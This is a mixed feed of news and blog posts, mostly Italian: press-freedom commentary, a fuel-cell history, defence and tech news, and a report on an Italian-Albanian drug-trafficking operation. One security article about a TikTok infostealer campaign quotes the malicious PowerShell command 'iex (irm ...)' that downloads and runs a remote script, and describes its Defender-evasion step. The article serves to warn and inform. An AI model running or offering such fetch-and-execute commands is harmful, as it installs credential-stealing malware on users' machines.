Salta al contenuto principale




Recent leaks reinforce why journalist-source confidentiality needs protecting


When the Trump administration quickly fulfilled our Freedom of Information Act request for a memo belying its own rationales both for mass deporting Venezuelans and for cracking down on leaks to the press, we had plenty of theories about why.

Maybe someone in the FOIA office used our request as an opportunity to blow the whistle. Maybe it was some kind of mistake. But one possibility that never occurred to us was that administration higher-ups somehow thought that the memo made them look good. After all, everyone knows President Donald Trump hires only the “best and most serious people.”

But according to a report in The New York Times, that’s exactly what happened. So who was the poor junior staffer who somehow read a short, straightforward memo wherein intelligence agencies said Venezuela’s government does not control the Tren de Aragua gang, as Trump claims, and took it to mean, well, the complete opposite? The intelligence community had better stop hiring from whatever school gave that kid a degree!

Turns out it wasn’t some kid, though. It was Joe Kent, chief of staff to Director of National Intelligence Tulsi Gabbard. And get this: He’s Trump’s nominee to lead the National Counterterrorism Center. Apparently, after a first memo undermined Trump’s narrative that Venezuelan migrants are actually President Nicolás Maduro’s secret foot soldiers, Kent requested some “rewriting … so this document is not used against the DNI or POTUS.”

The memo released to us was apparently the rewrite — which confirmed the conclusions of the initial memo. It did mention that the FBI believed some Venezuelan government officials might communicate with some members of Tren de Aragua, but no serious legal minds believe that constitutes an invasion that justifies Trump’s invoking of the Alien Enemies Act.

Kent, however, somehow read it (or maybe that’s giving him too much credit) and thought it vindicated the administration. No one else read it that way, including Secretary of State (among other jobs) Marco Rubio. Rubio didn’t even attempt to twist the memo into somehow supporting the administration’s policies — he just said the intelligence community got it wrong.

But the reason Freedom of the Press Foundation (FPF) filed the FOIA in the first place was not to prove whether Maduro has gangbangers on speed dial or whether high-ranking intelligence officials lack intelligence. It was to check whether Attorney General Pam Bondi’s basis for repealing her predecessor’s safeguards against subpoenaing journalists held water.

Bondi, as well as Gabbard, claimed reports from The New York Times and The Washington Post were false when stating that intelligence agencies disbelieved Trump’s claims about Tren de Aragua. The administration, these officials said, needed the ability to investigate the source of the leak, including by subpoenaing journalists, to protect the nation from so-called fake news from the so-called deep state.

The memo, as we’ve written before, confirmed that the Times and Post got it right and the only thing a crackdown on leaks was meant to protect was Trump and his cronies from embarrassment. But the memo has turned into more than that — it’s become Exhibit A on why leaks to the press serve the public interest.

Here’s a non-exhaustive list of news we now know about because of the leaks to the Times and Post, the memo we were able to request as a result of those leaks, and the reporting that followed.

  • Kent, the nominee to lead the National Counterterrorism Center, can’t comprehend basic intelligence reports.
  • Kent demanded intelligence agencies rewrite their findings to save his bosses from embarrassment and, according to the Times, there are emails to prove it (we have filed requests for those, too).
  • There is a major rift between the State Department and the intelligence community about one of the Trump administration’s most significant policies.
  • Gabbard requested Bondi initiate a leak investigation based on lies.
  • Bondi repealed protections for reporters and their sources based on the same lies.
  • The United States mass deported people to a dangerous prison in El Salvador to perform slave labor for a Trump-friendly authoritarian — all based on the same lies.

Virtually every time the government has cracked down on leaks claiming some kind of threat to the homeland, the real threat has been to its own reputation. Usually it takes years to confirm the obvious. It took decades for Nixon officials who once argued that releasing the Pentagon Papers would gravely endanger national security to admit that was nonsense all along. But this time we know the truth almost immediately, thanks to leaks.

Bondi was right about one thing — the leaks undermined the administration’s policies. But she left out that they were policies that needed undermining because they were built on lies — the kinds of lies that the drafters of the Constitution intended journalists to expose when they wrote the First Amendment’s press clause. That’s what the Times, Post, and their sources did, and it’s exactly why journalist-source confidentiality needs protecting.


freedom.press/issues/recent-le…



A Brief History of Fuel Cells


If we asked you to think of a device that converts a chemical reaction into electricity, you’d probably say we were thinking of a battery. That’s true, but there is another device that does this that is both very similar and very different from a battery: the fuel cell.

In a very simple way, you can think of a fuel cell as a battery that consumes the chemicals it uses and allows you to replace those chemicals so that, as long as you have fuel, you can have electricity. However, the truth is a little more complicated than that. Batteries are energy storage devices. They run out when the energy stored in the chemicals runs out. In fact, many batteries can take electricity and reverse the chemical reaction, in effect recharging them. Fuel cells react chemicals to produce electricity. No fuel, no electricity.

Superficially, the two devices seem very similar. Like batteries, fuel cells have an anode and a cathode. They also have an electrolyte, but its purpose isn’t the same as in a conventional battery. Typically, a catalyst causes fuel to oxidize, creating positively charged ions and electrons. These ions move from the anode to the cathode, and the electrons move from the anode, through an external circuit, and then to the cathode, so electric current occurs. As a byproduct, many fuel cells produce potentially useful byproducts like water. NASA has the animation below that shows how one type of cell works.

youtube.com/embed/V3ChCroWttY?…

History


Sir William Grove seems to have made the first fuel cell in 1838, publishing in The London and Edinburgh Philosophical Magazine and Journal of Science. His fuel cell used dilute acid, copper sulphate, along with sheet metal and porcelain. Today, the phosphoric acid fuel cell is similar to Grove’s design.

The Bacon fuel cell is due to Francis Thomas Bacon and uses alkaline fuel. Modern versions of this are in use today by NASA and others. Although Bacon’s fuel cell could produce 5 kW, it was General Electric in 1955 that started creating larger units. GE chemists developed an ion exchange membrane that included a platinum catalyst. Named after the developers, the “Grubb-Niedrach” fuel cell flew in Gemini space capsules. By 1959, a fuel cell tractor prototype was running, as well as a welding machine powered by a Bacon cell.

One of the reasons spacecraft often use fuel cells is that many cells take hydrogen and oxygen as fuel and put out electricity and water. There are already gas tanks available, and you can always use water.

Types of Fuel Cells


Not all fuel cells use the same fuel or produce the same byproducts. At the anode, a catalyst ionizes the fuel, which produces a positive ion and a free electron. The electrolyte, often a membrane, can pass ions, but not the electrons. That way, the ions move towards the cathode, but the electrons have to find another way — through the load — to get to the cathode. When they meet again, a reaction with more fuel and a catalyst produces the byproduct: hydrogen and oxygen form water.

Most common cells use hydrogen and oxygen with an anode catalyst of platinum and a cathode catalyst of nickel. The voltage output per cell is often less than a volt. However, some fuel cells use hydrocarbons. Diesel, methanol, and other hydrocarbons can produce electricity and carbon dioxide as a byproduct, along with water. You can even use some unusual organic inputs, although to be fair, those are microbial fuel cells.

Common types include:

  • Alkaline – The Bacon cell was a fixture in space capsules, using carbon electrodes, a catalyst, and a hydroxide electrolyte.
  • Solid acid – These use a solid acid material as electrolyte. The material is heated to increase conductivity.
  • Phosphoric acid – Another acid-based technology that operates at hotter temperatures.
  • Molten carbonate – These work at high temperatures using lithium potassium carbonate as an electrolyte.
  • Solid oxide – Another high temperature that uses zirconia ceramic as the electrolyte.

In addition to technology, you can consider some fuel cells as stationary — typically producing a lot of power for consumption by some power grid — or mobile.

Using fuel cells in stationary applications is attractive partly because they have no moving parts. However, you need a way to fuel it and — if you want efficiency — you need a way to harness the waste heat produced. It is possible, for example, to use solar power to turn water into gas and then use that gas to feed a fuel cell. It is possible to use the heat directly or to convert it to electricity in a more conventional way.

Space


Fuel cells have a long history in space. You can see how alkaline Bacon cells were used in early fuel cells in the video below.

youtube.com/embed/OouXKyroV4w?…
Apollo (left) and Shuttle (right) fuel cells (from a NASA briefing)
Very early fuel cells — starting with Gemini in 1962 — used a proton exchange membrane. However, in 1967, NASA started using Nafion from DuPont, which was improved over the old membranes.

However, alkaline cells had vastly improved power density, and from Apollo on, these cells, using a potassium hydroxide electrolyte, were standard issue.

Even the Shuttle had fuel cells. Russian spacecraft also had fuel cells, starting with a liquid oxygen-hydrogen cell used on the Soviet Lunar Orbital Spacecraft (LOK).

The shuttle’s power plant measured 14 x 15 x 45 inches and weighed 260 pounds. They were installed under the payload bay, just aft of the crew compartment. They drew cryogenic gases from nearby tanks and could provide 12 kW continuously, and up to 16 kW. However, they typically were taxed at about 50% capacity. Each orbiter’s power plant contained 96 individual cells connected to achieve a 28-volt output.

Going Mobile


There have been attempts to make fuel cell cars, but with the difficulty of delivering, storing, and transporting hydrogen, there has been resistance. The Toyota Mirai, for example, costs $57,000, yet owners sued because they couldn’t obtain hydrogen. Some buses use fuel cells, and a small number of trains (including the one mentioned in the video below).

youtube.com/embed/0d0h42IZlWU?…

Surprisingly, there is a market for forklifts using fuel cells. The clean output makes them ideal for indoor operation. Batteries? They take longer to charge and don’t work well in the cold. Fuel cells don’t mind the cold, and you can top them off in three minutes.

There have been attempts to put fuel cells into any vehicle you can imagine. Airplanes, motorcycles, and boats sporting fuel cells have all made the rounds.

Can You DIY?


We have seen a few fuel cell projects, but they all seem to vanish over time. In theory, it shouldn’t be that hard, unless you demand commercial efficiency. However, it can be done, as you can see in the video below. If you make a fuel cell, be sure to send us a tip so we can spread the word.

youtube.com/embed/NE6dxzDeWbI?…

Featured image: “SEM micrograph of an MEA cross section” by [Xi Yin]


hackaday.com/2025/05/22/a-brie…



Tutte le mosse dell’Italia nell’Indo-Pacifico, tra naval diplomacy e accordi industriali

@Notizie dall'Italia e dal mondo

Durante la Langkawi International Maritime and Aerospace Exhibition (Lima), Fincantieri ed Enra energy solutions hanno firmato un accordo di collaborazione tecnica in favore del programma strategico “15 to 5” per il rafforzamento delle capacità navali operative




Difesa europea, il nodo politico che frena l’integrazione. L’analisi di Caruso

@Notizie dall'Italia e dal mondo

Nel contesto di crescente instabilità geopolitica, l’Unione europea sta accelerando il processo di rafforzamento della propria architettura di difesa collettiva. Lo scorso 15 maggio, durante la riunione del Comitato militare dell’Ue (Eumc) a livello di capi di Stato



June PPI Meetings


Ahoy Pirates,

Our next PPI board meeting will take place on 03.06.2025 at 14:00 UTC / 16:00 CEST.

Prior to that meeting we will hold a SCENE and SCUBA working groups meeting in the same Jitsi room a week later, 10.06.2025 at 19:00 UTC / 21:00 CEST.

All official PPI proceedings, Board meetings included, are open to the public. Feel free to stop by. We’ll be happy to have you.

Where:jitsi.pirati.cz/PPI-BoardAgenda: etherpad.pp-international.net/…

All of our meetings are posted to our calendar: pp-international.net/calendar/

We look forward to seeing visitors.

Thank you for your support,

The Board of PPI


pp-international.net/2025/05/j…



Un nuovo modello di lavoro: la tavola rotonda del Parlamento Europeo in collaborazione con TPI


@Politica interna, europea e internazionale
Venerdì 23 maggio, alle ore 11,30, presso Esperienza Europa – David Sassoli il Parlamento Europeo, in collaborazione con The Post Internazionale (TPI), organizza la tavola rotonda “Un nuovo modello di lavoro: la direttiva UE per stage di qualità“. Un



Hai seguito un bel tutorial su TikTok e non sei stato attento? Bravo, ti sei beccato un malware!


In un preoccupante segnale dell’evoluzione delle tattiche cybercriminali, i threat actor stanno ora sfruttando la popolarità di TikTok come canale per la distribuzione di malware avanzati progettati per il furto di informazioni. L’ultima campagna in circolazione si concentra sulla diffusione degli infostealer Vidar e StealC, inducendo gli utenti a eseguire comandi PowerShell dannosi con il pretesto di attivare software legittimi o sbloccare funzionalità premium in applicazioni come Windows OS, Microsoft Office, CapCut e Spotify.

A differenza dei metodi tradizionali — come i siti web compromessi o le email di phishing — questo vettore d’attacco si basa esclusivamente su tecniche di ingegneria sociale veicolate tramite video. I criminali informatici realizzano video anonimi, spesso generati con strumenti di intelligenza artificiale, che guidano passo dopo passo le vittime nell’installazione inconsapevole del malware sui propri dispositivi.

Questo approccio è particolarmente insidioso perché non lascia alcun codice dannoso sulla piattaforma stessa che le soluzioni di sicurezza possano rilevare e tutti i contenuti fruibili vengono forniti in modo visivo e uditivo. I ricercatori di Trend Micro hanno identificato diversi account TikTok coinvolti in questa campagna, tra cui @gitallowed, @zane.houghton, @allaivo2, @sysglow.wow, @alexfixpc e @digitaldreams771.

La loro indagine ha rivelato che alcuni video hanno ottenuto un notevole successo: uno in particolare ha ottenuto oltre 20.000 “Mi piace”, 100 commenti e ha raggiunto circa 500.000 visualizzazioni. Questa ampia diffusione dimostra il potenziale impatto della campagna e sottolinea come la portata algoritmica di TikTok possa amplificare contenuti dannosi.

Le conseguenze per le vittime sono gravi, poiché questi ladri di informazioni possono sottrarre dati sensibili, rubare credenziali e potenzialmente compromettere i sistemi aziendali. Una volta installato, il malware stabilisce una comunicazione con i server di comando e controllo, consentendo agli aggressori di raccogliere informazioni preziose dai dispositivi compromessi.

Meccanismo di infezione e analisi tecnica


La catena di infezione inizia quando gli utenti seguono le istruzioni video per aprire PowerShell (premendo Windows+R e digitando “powershell”) e quindi eseguono un comando simile a: iex (irm https://allaivo[.]me/spotify). Questo comando dall’aspetto innocuo scarica ed esegue uno script remoto (SHA256: b8d9821a478f1a377095867aeb2038c464cc59ed31a4c7413ff768f2e14d3886) che avvia il processo di infezione.

Una volta eseguito, lo script crea delle directory nascoste nelle cartelle APPDATA e LOCALAPPDATA dell’utente, quindi aggiunge questi percorsi all’elenco di esclusione di Windows Defender: una sofisticata tecnica di elusione che aiuta il malware a evitare il rilevamento. Il malware procede quindi a scaricare ulteriori payload, tra cui i ladri di informazioni Vidar e StealC.

Queste varianti di malware sono particolarmente pericolose perché prendono di mira informazioni sensibili, tra cui password salvate, portafogli di criptovalute e cookie di autenticazione. Dopo l’installazione, il malware si connette a vari server di comando e controllo, tra cui servizi legittimi utilizzati in modo improprio.

Vidar, ad esempio, utilizza i profili Steam (hxxps://steamcommunity[.]com/profiles/76561199846773220) e i canali Telegram (hxxps://t[.]me/v00rd) come “Dead Drop Resolver” per nascondere la sua effettiva infrastruttura C&C, una tecnica che rende il tracciamento e l’interruzione più difficili. Ciò che rende questa campagna particolarmente efficace è il modo in cui fonde l’ingegneria sociale con lo sfruttamento tecnico.

Presentandosi come utili tutorial per accedere alle funzionalità premium dei software più diffusi, i video creano fiducia negli spettatori, che poi eseguono volentieri i comandi che compromettono i loro sistemi. Ciò rappresenta un’evoluzione significativa negli attacchi basati sui social media, dimostrando come gli autori delle minacce continuino ad adattare le proprie tattiche per sfruttare il comportamento degli utenti ed eludere i controlli di sicurezza tradizionali.

L'articolo Hai seguito un bel tutorial su TikTok e non sei stato attento? Bravo, ti sei beccato un malware! proviene da il blog della sicurezza informatica.



Lunedì 26 maggio ore 12, Andiamo verso il Parlamento - Sabato 31 maggio ore 14, Manifestazione nazionale a Roma - Il 26 maggio il Decreto Sicurezza passerà in discussione alla Camera. Dopo la trasformazione del DDL in Decreto, il Governo ha tempo fino al 12 giugno per approvare definitivamente la legge. È questo il poco [...]

Poliverso & Poliversity reshared this.



Sulle spallucce degli altri.


Una parte dell'Italia di oggi si regge sulle spallucce di chi non ha a cuore diritti e giustizia.

noblogo.org/transit/sulle-spal…


Sulle spallucce degli altri.


(166)

(S)

Un'espressione letta in un articolo mi ha colpito in modo particolare: “L'omertosa apatia del piccolo trambusto quotidiano.” Felicissima intuizione linguistica che riesce a racchiudere in sé uno dei crismi su cui poggia la fertile e vigorosa baldanza del liberismo nostrano, quello che toglie i diritti ai lavoratori e non solo abolendo leggi, ma riducendo il mondo del lavoro, anche quello operaio (ci sono, ci sono: non fate finta di niente) a mera paccottiglia senza valore, neanche umano.

E' quel sentire assai comune che porta alla coltivazione del famoso orticello, che con la staccionata lascia fuori tutti i ragionamenti non adatti alla crescita del proprio benessere, della propria fetta intoccabile di piccoli e spesso inutili “privilegi”. Che, di solito, si formano sulla cenere dei diritti negati ad altri. Ma stando al di là della staccionata, sono chiacchiericcio confuso. Una brezza leggera.

E' l'oltre, la pigrizia di chi sta con il sedere al caldo (o che pensa di averlo coperto) e che può, tranquillamente, silenziosamente, fregarsene di vertenze durissime e dei dannati che sperano in un esito che restituisca un po’ di fiato. Questo sono i lavoratori dei gioielli da preservare della “cultura” del lavoro, della tradizione più autentica e genuina della laboriosità illuminata della parte sana del Paese. Peccato che, come in ogni famiglia, le magagne ci sono, ed enormi.

(S1)

Questo è un corollario. L'Italia vive su questa “omertosa apatia“: possiamo dire che si regge sulle spallucce, quel gesto del corpo che sta a significare “Che me ne frega?”. Sì, ovviamente sono dalla parte di chi ha problemi, sono sinceramente preoccupato dalla condizione di milioni di concittadini costretti praticamente alla povertà pur lavorando e mi indigno fortemente (come se questo cambiasse qualcosa per qualcuno, ma non mi limito.)

Però, fermi: cinque minuti, in pausa caffè. Stasera apericena e c'è la partita in TV (a pagamento). Nessuno è innocente, in un gioco al massacro che vede soccombere giornalmente centinaia di famiglie: nella cosiddetta “società del benessere”, del “Ci sarà chi se ne preoccupa”, di coloro che sanno cosa devono fare gli altri, ma che personalmente ha le mani legate e lo sguardo basso da partecipazione emotiva spinta e sincera.

In piazza, davanti alle fabbriche, a mandare messaggi forti, mettendoci il corpo, la faccia, la pelle possono scendere sempre gli altri di cui sopra. Bravi, ma senza fare troppo casino, che ci si infastidisce. Ben attenti e ribadire che c'è chi deve risolvere le cose: a modino, con quella pragmatica calma che non dia noia al superiore, che certe discorsi non si fanno. Noi si sta bene, ce lo siamo guadagnato.

In Friulano si direbbe “Lasse stà” (lascia stare). E' la resa incondizionata al complice modus operandi di tutta quella genia imprenditoriale che scrive i “Codici etici” delle aziende e poi chiama la questura, che accorre prontamente, se ritiene che qualche manganellata al posto giusto sia un metodo meno aulico, ma più efficace di far filare le cose nella maniera corretta. Che, guarda caso, è sempre e solo la loro.

Tanto, parliamoci chiaro: sono molti di più quelli cui non frega nulla. E si sa che la maggioranza è ben salda e protetta. Dal 2022 poi...

#Lavoro #Diritti #Italia #Opinioni

Mastodon: @alda7069@mastodon.unoTelegram: t.me/transitblogFriendica: @danmatt@poliverso.orgBio Site (tutto in un posto solo, diamine): bio.site/danielemattioli

Gli scritti sono tutelati da “Creative Commons” (qui)

Tutte le opinioni qui riportate sono da considerarsi personali. Per eventuali problemi riscontrati con i testi, si prega di scrivere a: corubomatt@gmail.com




oggi su RadioTre Fahrenheit: dialogo sul numero de "La scuola delle cose" dedicato alle scritture di ricerca, sperimentali, complesse


oggi, alle 17:30, Rai RadioTre Fahrenheit: dialogo su "La scuola delle cose" (Lyceum/Mudima) n. 19 - SCRITTURA DI RICERCA
slowforward.net/2025/05/22/22m…


“la scuola delle cose” oggi pomeriggio su fahrenheit / rai radiotre


RaiTre Fahrenheit
Oggi pomeriggio, su Fahrenheit, Rai RadioTre, alle ore 17:20 circa, dialogo con Tommaso Giartosio sul nuovo numero (aprile 2025) del tabloid “La scuola delle cose“ (Lyceum), dedicato alla SCRITTURA DI RICERCA.

*
Per ascoltare (h. 17:20):
https://www.raiplaysound.it/programmi/fahrenheit

La scuola delle cose, n. 19, aprile 2025, SCRITTURA DI RICERCA (pubbl. Mudima / Lyceum)
cliccare per ingrandire

L’espressione “scrittura di ricerca” è in azione da diversi decenni, e di certo si perde già nelle profondità del Novecento. Tuttavia, dagli anni 2003-2009 (ovvero fra l’esplosione dei blog letterari e l’uscita del libro collettivo Prosa in prosa – edito da Le Lettere; ora da Tic edizioni) e fino a oggi, il numero di materiali sperimentali e saggi sugli stessi è decisamente cresciuto. Ha dunque senso ed è forse addirittura indispensabile iniziare a fare il punto della situazione. Un primo tentativo – insieme sintetico e corposo – è rappresentato da questo numero de «La scuola delle cose», appena uscito grazie alla Fondazione Mudima, all’associazione Lyceum e alla partecipazione dell’Associazione dipoesia. Il tabloid raccoglie otto scritti di altrettanti studiosi e studiose, intorno alla ricerca letteraria e alle scritture complesse. Firmano gli interventi Luigi Ballerini, Gian Luca Picconi, Massimiliano Manganelli, Luigi Magno, Chiara Portesine, Renata Morresi, Chiara Serani, Daniele Poletti.

Info:
Fondazione Mudima <info@mudima.net>

Fondazione Mudima:
mudima.net/

La scuola delle cose:
https://www.facebook.com/Lyceumscuoladellecose

Qui un caotico video:
instagram.com/marco.giovenale/…

#cambioDiParadigma #ChiaraPortesine #ChiaraSerani #CorradoCosta #DanielePoletti #dialogo #Fahrenheit #FondazioneMudima #GianLucaPicconi #GinoDiMaggio #intermedialità #intervista #LaScuolaDelleCose #langpo #languagePoetry #letteralità #LuigiBallerini #LuigiMagno #Lyceum #MassimilianoManganelli #MicheleZaffarano #Mudima #poesiaDiRicercaFrancese #ProsaInProsa #RadioTreFahrenheit #RaiRadioTre #RaiRadioTreFahrenheit #RenataMorresi #ricercaLetteraria #scritturaComplessa #scritturaDiRicerca #scritturaNonAssertiva #scritturaSperimentale #scrittureComplesse #scrittureDiRicerca #scrittureNonAssertive #scrittureNonConvenzionali #scrittureProcedurali #scrittureSperimentali #ScuolaDelleCose #sperimentazioneLetteraria #tabloid #tabloidMudima #TommasoGiartosio #traduzione #traduzioni





Trashed Sound System Lives to Rock another Day


Plenty of consumer goods, from passenger vehicles to toys to electronics, get tossed out prematurely for all kinds of reasons. Repairable damage, market trends, planned obsolescence, and bad design can all lead to an early sunset on something that might still have some useful life in it. This was certainly the case for a sound system that [Bill] found — despite a set of good speakers, the poor design of the hardware combined with some damage was enough for the owner to toss it. But [Bill] took up the challenge to get it back in working order again.
Inside the DIY control unit.
The main problem with this unit is that of design. It relies on a remote control to turn it on and operate everything, and if that breaks or is lost, the entire unit won’t even power on. Tracing the remote back to the control board reveals a 15-pin connector, and some other audio sleuths online have a few ways of using this port to control the system without the remote.

[Bill] found a few mistakes that needed to be corrected, and was eventually able to get an ESP8266 (and eventually an ESP32) to control the unit thanks largely to the fact that it communicates using a slightly modified I2C protocol.

There were a few pieces of physical damage to correct, too. First, the AC power cable had been cut off which was simple enough to replace, but [Bill] also found that a power connector inside the unit was loose as well. With that taken care of he has a perfectly functional and remarkably inexpensive sound system ready for movies or music. There are some other options available for getting a set of speakers blasting tunes again as well, like building the amplifier for them from scratch from the get-go.


hackaday.com/2025/05/22/trashe…




USA: Guai ai paesi che usano i chip di Huawei! Ma sotto pressione della Cina cambiano idea


Solo poche settimane dopo che Stati Uniti e Cina hanno tentato di allentare le tensioni commerciali, i rapporti tra i due paesi si sono nuovamente inaspriti, questa volta a causa dei semiconduttori.

Il Ministero del Commercio cinese ha minacciato di intraprendere azioni legali contro qualsiasi azienda o Paese che rispetti le restrizioni sulle esportazioni di chip AI di Huawei. Lo ha riportato Bloomberg .

Il motivo sono le nuove direttive emanate dall’amministrazione Donald Trump il 13 maggio, che hanno ricordato che l’utilizzo dei chip AI Huawei Ascend “in qualsiasi parte del mondo” è considerato una violazione delle normative statunitensi sull’esportazione.

Le linee guida giungono mentre gli Stati Uniti stanno abrogando le normative sull’intelligenza artificiale introdotte sotto la presidenza di Joe Biden.

All’inizio della settimana, la Cina ha affermato che le azioni degli Stati Uniti stavano compromettendo gli accordi raggiunti nei colloqui di Ginevra volti a stabilizzare le relazioni. Pechino ha visto le nuove direttive come un gesto politico che viola lo spirito della riconciliazione raggiunta e ha accusato gli Stati Uniti di ostacolare i progressi nei colloqui.

A seguito delle critiche provenienti dalla Cina, il Dipartimento del Commercio degli Stati Uniti ha modificato la formulazione del documento, rimuovendo la parte più restrittiva, ovvero il riferimento a “ovunque nel mondo”, ha riportato Bloomberg.

Il rischio, ricorda Pechino, è che “questa pratica di utilizzare il protezionismo unilaterale per contenere e isolare altri paesi finirà per minare la competitività dell’industria statunitense, e il risultato non può che essere quello di darsi la zappa sui piedi”.

L'articolo USA: Guai ai paesi che usano i chip di Huawei! Ma sotto pressione della Cina cambiano idea proviene da il blog della sicurezza informatica.



OpenAI con io Products minaccia Apple?

L'articolo proviene da #StartMag e viene ricondiviso sulla comunità Lemmy @Informatica (Italy e non Italy 😁)
OpenAI acquisterà io Products, la startup dell'ex super designer di Apple Jony Ive. Sam Altman assicura che il loro primo prodotto non farà sparire lo smartphone eppure c'è chi vede questa nuova avventura come "un cattivo presagio" per il produttore di

reshared this



STUPEFACENTI DALL'ALBANIA ALL'ITALIA. Tra le fonti di prova le chat criptate della piattaforma SKYECC



Le autorità in Italia e in Albania hanno inferto un duro colpo a tre gruppi di criminalità organizzata legati nel traffico di droga su larga scala e nel riciclaggio di denaro. Durante una giornata di azione congiunta, i mandati di arresto sono stati emessi contro 52 sospetti, compresi gli individui che si ritiene siano ai massimi livelli nelle gerarchie dei gruppi. Eurojust ha sostenuto la cooperazione tra le autorità italiane e albanesi creando un team di indagine congiunto (JIT/SIC Squadra Investigativa Comune). Durante il giorno dell'azione, le autorità di entrambi i paesi hanno sequestrato attività per un valore di almeno diversi milioni di euro, Compresi appartamenti e aziende, nonché vari veicoli di lusso. Sono state anche sequestrate grandi quantità di denaro e quantità di cocaina ed eroina.

Le reti criminali erano coinvolte nei pagamenti, spesso in contanti, di quasi 5 milioni di euro e il traffico di almeno 1 800 chili di cocaina ed eroina.
La Direzione Investigativa Antimafia di Bari e le Autorità Albanesi, con l’ausilio di Interpol, dell’Ufficio dell’Esperto per la Sicurezza di Tirana e della Polizia Albanese, nell’ambito di una Squadra Investigativa Comune, hanno eseguito, su disposizione della Direzione Distrettuale Antimafia di Bari e la Procura Speciale Anticorruzione e Criminalità Organizzata di Tirana, con il Coordinamento di Eurojust (L’Aja) e della Direzione Nazionale Antimafia ed Antiterrorismo di Roma, due ordinanze di custodia cautelare, emesse dal Giudice per le Indagini Preliminari di Bari e dal Giudice presso il Tribunale Speciale di Primo Grado Anticorruzione e Criminalità Organizzata di Tirana nei confronti, complessivamente, di 52 persone responsabili a vario titolo, di traffico internazionale di ingenti quantitativi di sostanze stupefacenti, riciclaggio e abuso d’ufficio.

I provvedimenti cautelari, emessi nell’ambito dell’Operazione URA a fronte delle indagini effettuate dalla DIA di Bari tra settembre 2021 e giugno 2022, hanno consentito di raccogliere gravi indizi di colpevolezza a carico degli indagati, albanesi ed italiani, appartenenti in Italia a due associazioni criminali – riconosciute tali dal G.I.P. di Bari – stanziate nello stesso capoluogo pugliese (accertamento compiuto nella fase delle indagini preliminari che necessita della successiva verifica processuale nel contraddittorio con la difesa) nonché, in Albania, facenti parte di un potente gruppo criminale organizzato – riconosciuto tale dal Giudice di Tirana – stanziato a Durazzo.
La DIA, relativamente agli ingenti quantitativi di eroina e cocaina movimentati, a decorrere dal 2016, tra i Balcani, il Nord Europa, il Sud America e la Puglia, ha documentato l’esistenza di una comunanza d’interessi tra il gruppo criminale in Albania, deputato – a livello transnazionale – alla commercializzazione ed al trasferimento dello stupefacente, e le due associazioni criminali operanti a Bari le quali, a loro volta, effettuate le operazioni di “taglio” e confezionamento in panetti, rifornivano all’ingrosso le organizzazioni baresi, brindisine e leccesi interessate a ricevere l’eroina e la cocaina – di qualità – proveniente rispettivamente dalla Turchia e dall’America Latina.

Le complesse indagini, effettuate con intercettazioni telefoniche, ambientali, video-riprese e servizi di osservazione, pedinamento e controllo, avvalorate dall’estrapolazione e dall’analisi delle chat criptate acquisite dalla piattaforma SKYECC, nonché dalle dichiarazioni di tre collaboratori di giustizia (di cui ne è stata accertata la credibilità e l’attendibilità), hanno permesso, tra l’altro, di documentare, in relazione alla sostanza stupefacente inviata a Bari principalmente dall’Albania e dal Nord Europa, innumerevoli rifornimenti (255 chili di eroina “pura” e cocaina “pura”) effettuati tramite corrieri internazionali. Nel medesimo contesto è stato ricostruito un “flusso” ininterrotto di denaro contante dalla Puglia all’Albania, a pagamento dello stupefacente commercializzato all’“ingrosso”, avvenuto tramite autisti di autobus di linea internazionali, le cui illegali transazioni, per un importo complessivo di 4,5 milioni di euro, hanno consentito alle Autorità Albanesi di contestare il reato di riciclaggio.
In tale ambito sono stati inoltre ricostruite: diverse consegne di denaro contante a pagamento della droga, avvenute a Bari, per importi superiori anche a mezzo milione di euro; il trasferimento di oltre 500 mila dollari dall’Albania all’America Latina, versati quale anticipo per l’acquisto di una partita di 500 chili di cocaina spedita da Guayaquil (Ecuador); episodi di abuso d’ufficio verificatisi in territorio albanese.
I riscontri utilizzati per dimostrare l’operatività delle tre associazioni criminali transnazionali hanno riguardato un precedente sequestro di 3 milioni di euro in denaro contante a Durazzo (Albania) nonché i sequestri di stupefacente effettuati, in circostanze diverse: di oltre 30 chili di eroina ed alcuni “laboratori artigianali” adibiti, a Bari e provincia, al taglio e confezionamento della droga in panetti; di 2 tonnellate di cocaina al porto di Rotterdam (Olanda); di 932 chili di cocaina al porto di Gioia Tauro (Reggio Calabria); di 400 chili di Hashish a Noicattaro (Bari).
Novità di questa indagine è rappresentata dall’utilizzo, tra le fonti di prova, delle chat criptate della piattaforma SKYECC, acquisite con Ordini Europei d’Indagine presso il Tribunale di Parigi. I messaggi, una volta decodificati dagli investigatori della Dia di Bari e condivisi con gli Ufficiali della S.P.A.K. di Tirana, sono stati minuziosamente analizzati e incrociati con le altre risultanze d’indagine, consentendo le contestazioni di reato sia alla D.D.A. di Bari che all’Autorità Giudiziaria albanese.
Il G.I.P. del Tribunale di Bari, dott. Francesco Vittorio Rinaldi, accogliendo le risultanze investigative della locale DDA, (allo stato, fatta salva la valutazione nelle fasi successive con il contributo della difesa) ha riconosciuto il “salto di qualità”, soprattutto dal punto di vista dell’utilizzo di strumenti tecnologici all’avanguardia, il “know-how” e la “capacità imprenditoriale” dei narcotrafficanti albanesi, capaci di gestire vere e proprie “holding criminali” ed in grado di rifornire gruppi mafiosi egemoni nella città di Bari.
I provvedimenti restrittivi emessi dal Giudice presso il Tribunale di Tirana hanno riguardato, tra gli altri, i vertici di una potente famiglia egemone nella città di Durazzo, un Comandante e un Agente della Polizia albanese, un Avvocato e 6 autisti di autobus di linea internazionale.
Le misure cautelari patrimoniali, (allo stato, salvo ulteriore verifica successiva nella fase decisoria con il contraddittorio con la difesa), hanno riguardato in Italia il sequestro preventivo funzionale alla confisca di beni mobili ed immobili tra i quali 9 appartamenti, 4 Società, 7 conti correnti e 3 autovetture e, in Albania, il sequestro di diversi immobili, 2 Società di costruzioni, 4 ristoranti di lusso, 1 Agenzia Immobiliare, 1 rete Televisiva, il cui valore complessivo è stimato in diversi milioni di euro.

L’esecuzione dell’operazione internazionale è stata resa possibile grazie alla Squadra Investigativa Comune, strumento di cooperazione giudiziaria istituito tra la D.D.A. di Bari, la S.P.A.K. di Tirana ed Eurojust (Organismo che sostiene la cooperazione giudiziaria nella lotta contro le forme gravi di criminalità transnazionale), che ha consentito al personale della DIA di Bari ed alle Autorità Albanesi di effettuare approfondimenti investigativi congiunti, avvalendosi del fondamentale ruolo di coordinamento assicurato dalla Direzione Nazionale Antimafia e Antiterrorismo.
